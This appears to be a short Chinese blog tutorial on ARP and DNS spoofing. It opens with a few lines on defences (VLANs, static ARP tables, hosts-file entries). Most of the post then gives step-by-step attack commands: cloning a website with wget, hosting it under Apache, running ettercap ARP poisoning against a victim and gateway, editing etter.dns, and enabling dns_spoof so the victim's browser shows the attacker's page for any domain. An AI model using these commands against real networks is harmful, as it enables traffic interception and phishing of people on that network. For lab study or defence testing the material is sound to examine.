ARP欺骗

1.如何防止arp欺骗

划分vlan和绑定静态的arp表,静态arp表有个弊端就是,如果你绑定的那台旧主机拆走了,接进来另外一台新主机,而你的arp表存的旧主机的mac,这样数据包就转发不出去了,很坑吧,哈哈。

dns解析过程是这样的:先通过本机的host文件解析,如果不能解析,就让最近的dns服务器解析 。其实dns解析还分为递归解析和迭代解析。这里不解释。

如何防止dns欺骗:

直接修改自己的host文件,将你访问的域名和ip地址直接写到里面,这样就不用通过dns服务器了,也就无法被骗 。

2.wget克隆网站
          命令格式:wget  -d -r -c  url地址

        下载完后会在当前目录下创建和url同名的文件夹
3.将网站源文件放到httpd的默认文件夹下 /var/www/
4.开始arp欺骗
     命令格式:
 ​
                 ettercap -Tq -i  网卡   -M arp:remote /要欺骗的ip// /网关ip//
 ​
       提示:有线网卡一般为eth0,如果你挂载了外接的无限网卡一般为wlan0
 ​
      欺骗的主机是192.168.43.10  ,网关是192.168.43.1 
5.重要一步:修改 vim /etc/ettercap/etter.dns
6.开始dns欺骗

命令格式:

ettercap -Tq -i eth0 -M arp:remote -P dns_spoof /要欺骗的ip// /网关的ip//

7.开启Apache服务

命令:

service apache2 start

检验成果

让被欺骗的那个主机浏览器任意输入一个域名,会发现显示的都是你的网站界面。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值